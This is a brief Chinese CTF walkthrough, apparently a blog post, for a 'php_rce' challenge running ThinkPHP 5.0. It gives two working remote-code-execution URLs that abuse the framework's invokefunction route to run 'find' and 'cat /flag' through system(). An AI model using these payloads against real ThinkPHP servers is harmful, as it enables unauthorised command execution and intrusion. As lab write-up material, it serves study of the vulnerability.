2020.3.27 (php_rce)③

本题使用的框架是ThinkPHP 5.0 的框架。此版本存在getshell漏洞(百度一下poc一抓一大把)
查找flag:

http://111.198.29.45:45747/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22

在这里插入图片描述
得到flag的payload:

http://111.198.29.45:45747/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag 

在这里插入图片描述

发布了48 篇原创文章 · 获赞 3 · 访问量 3369

猜你喜欢

转载自blog.csdn.net/DSR446/article/details/105153195